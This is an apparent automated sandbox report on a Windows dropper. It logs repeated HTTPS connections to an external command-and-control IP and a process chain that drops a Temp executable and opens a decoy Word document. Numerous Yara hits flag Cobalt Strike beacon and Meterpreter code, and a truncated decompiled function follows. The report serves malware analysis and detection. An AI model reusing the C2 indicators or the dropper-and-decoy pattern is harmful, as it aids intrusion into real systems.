                                                                                                                          Aug 5, 2022 09:56:47.761111021 CEST144349842124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:48.596637964 CEST498471443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:48.821079016 CEST144349847124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:49.359769106 CEST498471443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:49.577642918 CEST144349847124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:50.172055006 CEST498471443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:50.391778946 CEST144349847124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:50.918701887 CEST498531443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:51.131690979 CEST144349853124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:51.662951946 CEST498531443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:51.875917912 CEST144349853124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:52.562346935 CEST498531443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:52.779340982 CEST144349853124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:52.987561941 CEST498571443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:53.181108952 CEST144349857124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:56:53.765299082 CEST498571443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:59.767143011 CEST498571443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:56:59.961982012 CEST144349857124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:00.725454092 CEST498731443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:00.948205948 CEST144349873124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:01.470530987 CEST498731443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:01.694565058 CEST144349873124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:02.267445087 CEST498731443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:02.490175009 CEST144349873124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:06.930372953 CEST498741443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:07.145890951 CEST144349874124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:07.767872095 CEST498741443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:07.983318090 CEST144349874124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:08.529794931 CEST498741443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:20.866230011 CEST498791443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:21.058701038 CEST144349879124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:21.644068003 CEST498791443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:21.836473942 CEST144349879124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:22.459851980 CEST498791443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:22.652327061 CEST144349879124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:23.206902981 CEST498801443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:26.269520044 CEST498801443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:26.497020960 CEST144349880124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:27.160239935 CEST498801443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:27.387630939 CEST144349880124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:30.360735893 CEST498811443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:30.580781937 CEST144349881124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:31.144969940 CEST498811443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:31.365962029 CEST144349881124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:31.957468987 CEST498811443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:32.177411079 CEST144349881124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:32.336950064 CEST498821443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:32.561477900 CEST144349882124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:33.145075083 CEST498821443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:33.369626999 CEST144349882124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:33.957612991 CEST498821443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:47.871036053 CEST498841443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:48.096177101 CEST144349884124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:48.662126064 CEST498841443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:48.887212992 CEST144349884124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:49.474666119 CEST498841443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:49.700737953 CEST144349884124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:54.769370079 CEST498871443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:54.992568970 CEST144349887124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:55.493818998 CEST498871443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:55.714248896 CEST144349887124.221.206.154192.168.2.5
                                                                                                                          Aug 5, 2022 09:57:56.262085915 CEST498871443192.168.2.5124.221.206.154
                                                                                                                          Aug 5, 2022 09:57:56.485327959 CEST144349887124.221.206.154192.168.2.5


                                                                                                                          Target ID:0
                                                                                                                          Start time:09:55:44
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Users\user\Desktop\1a#U77e5.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Users\user\Desktop\1a#U77e5.exe"
                                                                                                                          Imagebase:0x2a0000
                                                                                                                          File size:4732928 bytes
                                                                                                                          MD5 hash:3F2202E24AD0A66C08F88A18DD7B5FB4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low

                                                                                                                          Target ID:3
                                                                                                                          Start time:09:55:46
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Windows\Temp\????????????.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Temp\????????????.exe 9gb3vbgeng
                                                                                                                          Imagebase:0x1300000
                                                                                                                          File size:2062848 bytes
                                                                                                                          MD5 hash:84E3D79DA5E503374E61A17351781C14
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Cobaltbaltstrike_Beacon_Encoded, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.706923007.000000C0002D6000.00000004.00001000.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                          • Rule: Cobaltbaltstrike_Beacon_Encoded, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.705984762.000000C000174000.00000004.00001000.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                          • Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: netbiosX, Florian Roth
                                                                                                                          • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: FireEye
                                                                                                                          • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: CodeX
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Cobaltbaltstrike_Beacon_Encoded, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.706488711.000000C00023E000.00000004.00001000.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                          • Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: netbiosX, Florian Roth
                                                                                                                          • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                          • Rule: Cobaltbaltstrike_Beacon_x64, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                          • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: CodeX
                                                                                                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: netbiosX, Florian Roth
                                                                                                                          • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                          • Rule: Cobaltbaltstrike_Beacon_x64, Description: Detects CobaltStrike payloads, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                          • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                                                          • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: CodeX
                                                                                                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 26%, Metadefender, Browse
                                                                                                                          • Detection: 62%, ReversingLabs
                                                                                                                          Reputation:low

                                                                                                                          Target ID:4
                                                                                                                          Start time:09:55:47
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff77f440000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Target ID:5
                                                                                                                          Start time:09:55:47
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:cmd.exe /c start ?????????????????????.docx
                                                                                                                          Imagebase:0x7ff602050000
                                                                                                                          File size:273920 bytes
                                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Target ID:6
                                                                                                                          Start time:09:55:48
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff77f440000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Target ID:7
                                                                                                                          Start time:09:55:49
                                                                                                                          Start date:05/08/2022
                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\?????????????????????.docx" /o "
                                                                                                                          Imagebase:0xb60000
                                                                                                                          File size:1937688 bytes
                                                                                                                          MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high


                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:1.2%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:7.9%
                                                                                                                            Total number of Nodes:140
                                                                                                                            Total number of Limit Nodes:23

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: NameUser_snprintfgethostbynamegethostnamemallocstrrchr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3259335183-0
                                                                                                                            • Opcode ID: 5738243969cd75681ae2df40fc4f50feb926135a9c3fab60068e190284ab21a5
                                                                                                                            • Instruction ID: 1401a1a5a7c9e435818beda5d2c76b98288b2e0004b51a51d60f0254fc071e53
                                                                                                                            • Opcode Fuzzy Hash: 5738243969cd75681ae2df40fc4f50feb926135a9c3fab60068e190284ab21a5
                                                                                                                            • Instruction Fuzzy Hash: 2E51873171CE084FEF49AB6CAC467BA72D2E799311F20452DF18AC36A3DE34D8468755
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer_initp_misc_winsig
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2349294043-0
                                                                                                                            • Opcode ID: 17fc2fa0213fe3e3e5c02df0a8a964823dcff32e75d0e2e23afbf98fc9aa3fb0
                                                                                                                            • Instruction ID: fc9cfb5356432d5fccb39f63842349296c15be1b11a6baf5fffa5d95493c45c5
                                                                                                                            • Opcode Fuzzy Hash: 17fc2fa0213fe3e3e5c02df0a8a964823dcff32e75d0e2e23afbf98fc9aa3fb0
                                                                                                                            • Instruction Fuzzy Hash: 4EA1B431618E098FFF54FFB5EC9CAA937E2E768302B10892A940AC3574EA7CD505DB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintffreemalloc$_errno$AllocateHeap_callnewh
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1934227970-0
                                                                                                                            • Opcode ID: ff659012cdeda19b861d5990ca6c7d160011b042850ac3c2daa3d1ec64ebc86a
                                                                                                                            • Instruction ID: 3eb5e79df89371e7edca53e548e7bf0afd6041a1ce2f5ce92b37b8f87a46eadc
                                                                                                                            • Opcode Fuzzy Hash: ff659012cdeda19b861d5990ca6c7d160011b042850ac3c2daa3d1ec64ebc86a
                                                                                                                            • Instruction Fuzzy Hash: 91A1A532704E044BEF5ABB248C5ABBE72D1EB95322F60502DB446C3AE7DF74D8058769
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintf$CloseHandleHttpInternetOpenRequest_errno_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2188440133-0
                                                                                                                            • Opcode ID: 05ec5b25f3458f0a3abfdab4c8af626020cd5fc4938f23173a15de727656af18
                                                                                                                            • Instruction ID: 2d37c1242bc9b6f5565ead4f89318df51ae006afb13722152b8efe965ac8a755
                                                                                                                            • Opcode Fuzzy Hash: 05ec5b25f3458f0a3abfdab4c8af626020cd5fc4938f23173a15de727656af18
                                                                                                                            • Instruction Fuzzy Hash: 4971D63161CA488BEF19EB28DC896AD73E1FBA5322F10452EF44AC35A1DF34D9018795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$ConnectOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2790792615-0
                                                                                                                            • Opcode ID: fc8aec65cb6a2ce55a76e07b02a7604f138a78efeff345bde255f681f149a060
                                                                                                                            • Instruction ID: 191ff033272fe6558daeb4479da8caa74353b73468d6246c6fb07d1a07b35290
                                                                                                                            • Opcode Fuzzy Hash: fc8aec65cb6a2ce55a76e07b02a7604f138a78efeff345bde255f681f149a060
                                                                                                                            • Instruction Fuzzy Hash: 4251B331318A444FEF4ADF28DC9976977D5FB98312F20446DB08BC36A2DB78D9028B55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 329 25bf8abe4ec-25bf8abe50d call 25bf8abe544 gethostname 332 25bf8abe534 329->332 333 25bf8abe50f-25bf8abe51b gethostbyname 329->333 335 25bf8abe536-25bf8abe540 332->335 333->332 334 25bf8abe51d-25bf8abe522 333->334 334->332 336 25bf8abe524-25bf8abe52e 334->336 336->332 337 25bf8abe530-25bf8abe532 336->337 337->335
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: gethostbynamegethostname
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3961807697-0
                                                                                                                            • Opcode ID: 400d05cbf938ceea345569b5e4f4809c0a386e71c0b93fd0065ff311fd89406e
                                                                                                                            • Instruction ID: a3c68e3771791cfe53bf647c435a235d95587262dba2dabe6ff8d307aadc2222
                                                                                                                            • Opcode Fuzzy Hash: 400d05cbf938ceea345569b5e4f4809c0a386e71c0b93fd0065ff311fd89406e
                                                                                                                            • Instruction Fuzzy Hash: 48F09671305D054FFF95DB28AC9863932E1FB98315F141169F409C71A1EB74DC918715
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E0000025B25BF8A76D34(void* __edi, void* __esi, void* __esp, long long __rcx, signed char __rdx, long long __r8, long long __r9, intOrPtr _a4, long long _a8, signed char _a16, long long _a20, long long _a24, signed char _a28, long long _a32) {
                                                                                                                            				long long _v4;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v40;
                                                                                                                            				long long _v44;
                                                                                                                            				long long _v52;
                                                                                                                            				long long _v60;
                                                                                                                            				long long _v64;
                                                                                                                            				signed long long _v68;
                                                                                                                            				intOrPtr _v76;
                                                                                                                            				signed int* _v84;
                                                                                                                            				long long _v88;
                                                                                                                            				void* _v92;
                                                                                                                            				long long _v96;
                                                                                                                            				intOrPtr _v100;
                                                                                                                            				long long _v104;
                                                                                                                            				intOrPtr _v112;
                                                                                                                            				long long _t131;
                                                                                                                            				signed long long _t150;
                                                                                                                            				long long _t169;
                                                                                                                            
                                                                                                                            				_a32 = __r9;
                                                                                                                            				_a24 = __r8;
                                                                                                                            				_a16 = __rdx;
                                                                                                                            				_a8 = __rcx;
                                                                                                                            				_t131 = _a16 + _a24 - 0x40;
                                                                                                                            				_v88 = _t131;
                                                                                                                            				_v40 = _a24 + _t131 + 0x88;
                                                                                                                            				_v64 = _a16 + _v40;
